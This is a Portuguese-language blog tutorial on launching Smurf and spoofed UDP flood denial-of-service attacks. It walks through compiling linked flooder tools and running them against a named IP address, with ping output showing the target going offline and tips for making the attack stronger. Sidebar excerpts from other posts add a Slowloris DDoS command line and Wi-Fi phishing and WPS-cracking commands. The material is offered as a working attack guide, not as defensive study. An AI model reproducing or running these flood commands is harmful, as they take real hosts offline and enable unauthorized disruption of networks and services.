Pular para o conteúdo principal

Tutorial – Realizando ataque SMURF e UDP Flood


Para prosseguirmos precisamos de 3 coisas:
—> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de  broadcast.txt http://pastebin.com/UeKr5MGJ )



—> udp_flooder.c http://pastebin.com/wGkK495H

|=====================================|
| Primeiros passos |
|=====================================|

Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#

Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#

|=====================================|
| Preparando o ataque com Smurf |
|=====================================|

Para continuar daqui pra frente você precisa se tornar root no konsole.

Executando o smurf:
# ./smurf

usage: ./smurf <target> <bcast file> <num packets> <packet delay> <packet size>

target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102)

O comando que irei utilizar para atacar sera este abaixo:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

|=====================================|
| Atacando o alvo |
|=====================================|

Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms
^C
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5006ms

Esta “ON”, agora vou executar o comando para atacar:

# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

smurf.c v4.0 by TFreak

Flooding 200.140.161.201 (. = 25 outgoing packets)
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………

Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms

— 200.140.161.201 ping statistics —
28 packets transmitted, 5 received, 82% packet loss, time 27086ms

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
5 packets transmitted, 0 received, 100% packet loss, time 3999ms

Pronto, o alvo esta “OFF”.

(DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque.

Agora vamos utilizar o udp_flooder.

Para executa-lo:
# ./udp_flooder

[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]

Uso: ./udp_flooder <IP_Spoof> <Vitima> <Port_origem> <Port_Destino> <msg> <num_msgs>

O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)

Vamos “pingar” o host alvo:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms

— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5008ms

Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

— Estatisticas e infos do ataque ————-

Total de bytes enviados: [31000000]
—————————————-

Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
15 packets transmitted, 0 received, 100% packet loss, time 14112ms

Como podem ver o alvo ficou “OFF”.

Comentários

Postar um comentário

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.
Postar um comentário
Leia mais

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de
3 comentários
Leia mais

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p
Postar um comentário
Leia mais